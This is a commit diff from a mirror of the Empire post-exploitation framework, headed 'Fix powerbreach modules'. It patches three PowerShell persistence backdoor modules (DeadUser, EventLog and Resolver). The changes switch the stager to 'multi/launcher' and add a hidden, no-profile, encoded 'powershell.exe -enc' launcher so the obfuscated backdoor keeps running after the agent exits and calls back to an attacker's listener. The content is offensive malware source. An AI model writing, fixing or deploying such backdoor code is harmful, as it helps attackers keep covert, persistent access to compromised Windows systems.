infosecn1nja
/
Empire
mirror of https://github.com/infosecn1nja/Empire.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix powerbreach modules

websockets-multiuser
xorrior 2017-09-20 16:27:05 -04:00
parent ee390adc27
commit 55834180d4
3 changed files with 9 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
lib/modules/powershell/persistence/powerbreach/deaduser.py
View File

@ -149,7 +149,7 @@ Invoke-DeadUserBackdoor"""
else: else:
# set the listener value for the launcher # set the listener value for the launcher
stager = self.mainMenu.stagers.stagers["launcher"] stager = self.mainMenu.stagers.stagers["multi/launcher"]
stager.options['Listener']['Value'] = listenerName stager.options['Listener']['Value'] = listenerName
stager.options['Base64']['Value'] = "False" stager.options['Base64']['Value'] = "False"
@ -188,7 +188,8 @@ Invoke-DeadUserBackdoor"""
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
# transform the backdoor into something launched by powershell.exe # transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting # so it survives the agent exiting
launcher = helpers.powershell_launcher(script) modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
launcher = helpers.powershell_launcher(script, modifiable_launcher)
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stagerCode.split(" ") parts = stagerCode.split(" ")

5
lib/modules/powershell/persistence/powerbreach/eventlog.py
View File

@ -123,7 +123,7 @@ Invoke-EventLogBackdoor"""
else: else:
# set the listener value for the launcher # set the listener value for the launcher
stager = self.mainMenu.stagers.stagers["launcher"] stager = self.mainMenu.stagers.stagers["multi/launcher"]
stager.options['Listener']['Value'] = listenerName stager.options['Listener']['Value'] = listenerName
stager.options['Base64']['Value'] = "False" stager.options['Base64']['Value'] = "False"
@ -162,7 +162,8 @@ Invoke-EventLogBackdoor"""
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
# transform the backdoor into something launched by powershell.exe # transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting # so it survives the agent exiting
launcher = helpers.powershell_launcher(script) modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
launcher = helpers.powershell_launcher(script, modifiable_launcher)
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stagerCode.split(" ") parts = stagerCode.split(" ")

5
lib/modules/powershell/persistence/powerbreach/resolver.py
View File

@ -136,7 +136,7 @@ Invoke-ResolverBackdoor"""
else: else:
# set the listener value for the launcher # set the listener value for the launcher
stager = self.mainMenu.stagers.stagers["launcher"] stager = self.mainMenu.stagers.stagers["multi/launcher"]
stager.options['Listener']['Value'] = listenerName stager.options['Listener']['Value'] = listenerName
stager.options['Base64']['Value'] = "False" stager.options['Base64']['Value'] = "False"
@ -175,7 +175,8 @@ Invoke-ResolverBackdoor"""
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
# transform the backdoor into something launched by powershell.exe # transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting # so it survives the agent exiting
launcher = helpers.powershell_launcher(script) modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
launcher = helpers.powershell_launcher(script, modifiable_launcher)
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stagerCode.split(" ") parts = stagerCode.split(" ")